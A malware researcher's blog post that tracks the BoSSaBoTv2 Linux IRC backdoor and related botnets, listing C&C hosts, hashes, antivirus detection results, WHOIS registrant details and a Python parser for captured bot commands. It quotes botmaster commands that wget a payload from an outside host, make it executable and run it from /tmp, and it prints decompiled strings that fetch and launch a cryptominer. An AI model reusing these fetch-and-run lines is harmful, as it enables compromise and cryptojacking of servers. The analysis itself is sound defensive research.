BoSSaBoTv2 : another Linux IRC Backdoor

Today, I was looking at my web honeypot and this one caught my attention : http://www.malekal.com/modsec/index.php?ip=
The PHP vulnerability is widely used (I already wrote something about it : http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time I saw this base64decode code.

The code leads to haxmeup.uni.me ( – OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expected to get a PHP Shellbot as usual, but this time it was a FUD (fully undetected) binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

So I launched it :

It made a connection to (OVH again) on port 8067; there is an ircd behind it :

nmap -sV -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for
Host is up (0.027s latency).
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

So, an IRC backdoor.

Another surprise: the ircd doesn't have any module to hide users, etc.
~40 bots, not so much.
So let's play.

On the screenshot below, we can see that the botmaster launched an IP range scan, then some bots exploited some servers.
We can see that the exploit at was successful because the target joins the channel as a new bot, confirmed by my VM.
We got another DNS name, con32.cz.cc, that gives the same IP.

Two new bots :


The IRCd is new, around ~40 bots in 9 days :


The botmaster regularly makes the bots download a new binary, all from www.bilder-upload.eu (which seems legitimate) :

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab
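As an added example (not code from the original post), here is a small Python parser for captured bot command lines of the shape quoted above: it extracts the download URL and the dropped file path, and flags the wget / mv / chmod 777 / execute sequence in /tmp that the botmaster uses to push a new binary. The sample input is constructed from the four lines above.

```python
import re

# Constructed sample input: the botmaster command sequence quoted above,
# in the form it was captured on the IRCd channel.
SAMPLE_COMMANDS = """\
!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab
"""

# "!BOSS* SH <shell command>" is the shape of the captured lines.
CMD_RE = re.compile(r"^!BOSS\S*\s+SH\s+(?P<shell>.+)$")
WGET_RE = re.compile(r"^wget\s+(?P<url>\S+).*?-P\s+(?P<dir>\S+)")
MV_RE = re.compile(r"^mv\s+(?P<src>\S+)\s+(?P<dst>\S+)")
CHMOD_RE = re.compile(r"^chmod\s+(?P<mode>[0-7]{3,4})\s+(?P<path>\S+)")


def extract_indicators(text):
    """Pull download URLs, dropped file paths, chmod targets and executed
    paths out of captured '!BOSS* SH ...' lines."""
    iocs = {"urls": [], "dropped": [], "chmod": [], "executed": []}
    for line in text.splitlines():
        m = CMD_RE.match(line.strip())
        if not m:
            continue  # not a bot command, ignore channel chatter
        shell = m.group("shell").strip()
        if w := WGET_RE.match(shell):
            iocs["urls"].append(w.group("url"))
            name = w.group("url").rsplit("/", 1)[-1]
            iocs["dropped"].append(w.group("dir").rstrip("/") + "/" + name)
        elif mv := MV_RE.match(shell):
            iocs["dropped"].append(mv.group("dst"))  # renamed payload
        elif c := CHMOD_RE.match(shell):
            iocs["chmod"].append(c.group("path"))
        elif shell.startswith("/"):
            iocs["executed"].append(shell.split()[0])  # direct execution
    return iocs


def is_drop_and_run(iocs):
    """True when a path that was downloaded or renamed into place is made
    executable and then run: the drop-and-execute pattern seen here."""
    return any(p in iocs["dropped"] and p in iocs["chmod"]
               for p in iocs["executed"])


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_COMMANDS)
    print(found)
    print("drop-and-run:", is_drop_and_run(found))
```

The same function can be run over a channel log to collect every URL and /tmp path the botmaster pushed, which is the list you need for the abuse report.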

Some hashes and hosts recap :
haxmeup.uni.me / con32.cz.cc / con64.cz.cc ( – OVH)



Then I wrote a little script to send the abuse emails, hoping they will lose some bots 🙂



MalwareMustDie decompiled the binary; some strings : http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin capabilities :

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s

The most interesting :

000000007E1D   BoSSaBoTv2-%s

A Google search leads to this topic on http://www.hackforums.net/showthread.php?tid=4395309
According to the post date, the kit is new and the price is 100$


EDIT – September 8

Back, lots of attacks this weekend :


Binaries are undetected


IRCd : port 53


EDIT – September 21 2014 : Two botnets

We found two different botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t
The IRCd moved to IRC.DREAMBOXDB.COM ( (binary http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian :


He makes the bots download a .tgz : http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A : https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/


It's an IRC backdoor: it connects to the channels #linuxmafia and #m@trix on different ircds, including the Undernet network.
We can see the masters are imp / sloboz / demo with a 23.* IP range (same range as the BossaBackdoor C&C)

So I connected to Undernet and the guy sloboz was also connected.
He uses the same IP as the BossaBackdoor C&C :



As you can see, there are some G-lines resulting from virus detection; this is the .tgz IRC backdoor.


I also found this old topic where someone claims to have had his nickname stolen on the Undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is : *** HeyHey is sloboz@
The range leads to a Romanian IP range.

According to Urban Dictionary : http://www.urbandictionary.com/define.php?term=sloboz
There is also a city in Romania called Slobozia.

It seems he lost all his bots.

Very pleased to see that antivirus vendors have moved on his binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256: bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
File name : vti-rescan
Detection ratio : 16 / 53
Analysis date : 2014-09-15 09:55:35 UTC (6 days, 3 hours ago)
Antivirus Result Update
Ad-Aware Backdoor.BossaBot.A 20140915
Avast ELF:BossaBot-A [Trj] 20140915
BitDefender Backdoor.BossaBot.A 20140915
DrWeb Linux.BackDoor.Irc.4 20140915
Emsisoft Backdoor.BossaBot.A (B) 20140915
F-Secure Backdoor.BossaBot.A 20140915
GData Backdoor.BossaBot.A 20140915
Ikarus Backdoor.BossaBot 20140915
Kaspersky HEUR:Backdoor.Linux.Bassobo.a 20140915
MicroWorld-eScan Backdoor.BossaBot.A 20140915
Norman BossaBot.A 20140914
Sophos Linux/BosaBot-A 20140915
Symantec Linux.Backdoor.Kaiten 20140915
Tencent Win32.Backdoor.Gen.Ugrc 20140915
TrendMicro-HouseCall ELF_BASSBOT.A 20140915
nProtect Backdoor.BossaBot.A 20140914

Snk / sult4n network

The second botnet: 2598 local users; if all are bots, this is not bad.
Notice the server name Sult4n server.Bossa_sult4n

Binary : http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 – C&C SRV5050.CO ; KA3EK.COM ; IRCQFRUM.COM ( & 8RB.SU (
All these domains are registered with the email address : sullt4n@hotmail.com

Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com


A look at Google gives other old domains registered with the same IPs, used as C&C for Windows IRC backdoors : zerx-virus.biz and x01bkr2.biz

  • April 2009 : http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • March 2010 : MSN Worms : http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013 http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was well known because I made a write-up on it, about Win32.Phorpiex, a Skype worm (in French) : http://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAV, Urausy ransomware, Crypted ransomware, spambots and other malware.
exposedbotnets.com calls him « Snk » : http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy has been very active for years!

EDIT – May 5 2015 : Comeback

Around April 15th, a new attack to push some BossaBot.
Still PHP attacks :

and a ShellShock attempt with two different URLs :



IRCd :



The domain is suspended : https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015 : still active

Some days ago, I got this ShellShock attempt but the link was not working.
I recognized the URL used by BossaBot.


Today more ShellShock attempts, all from OVH.
Here is the list :


Also some PHP stuff as before :

Binaries are old, 5 months old :


but detections are still average :

SHA256: 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
File name : susu2
Detection ratio : 14 / 56
Analysis date : 2015-09-24 05:39:01 UTC (2 minutes ago)
Antivirus Result Update
AVG Linux/Tsunami 20150924
AhnLab-V3 Linux/Ssabobot.B 20150923
Avast ELF:Tsunami-BH [Cryp] 20150924
CAT-QuickHeal Linux.Ropys.PR6b5 20150924
DrWeb Linux.BackDoor.Sessox.1 20150924
ESET-NOD32 a variant of Linux/Tsunami.NAL 20150924
GData Linux.Trojan.Agent.750WU5 20150924
Jiangmin Backdoor/Linux.oo 20150922
Kaspersky HEUR:Backdoor.Linux.Ropys.a 20150924
NANO-Antivirus Trojan.Unix.Ropys.drxdby 20150924
Sophos Mal/Generic-S 20150923
Symantec Linux.Susiribot 20150923
Tencent Linux.Backdoor.Ropys.Liha 20150924
Zillya Trojan.Tsunami.Linux.80 20150923

The IRCd is at (Cloud-Servers)
Same IRCd modules as before.


Gonna ping some abuse contacts =)

EDIT – 6 October : still active

Still new binaries; MalwareMustDie also made an interesting tweet with an image link : http://t.co/OgNkLxSQGe

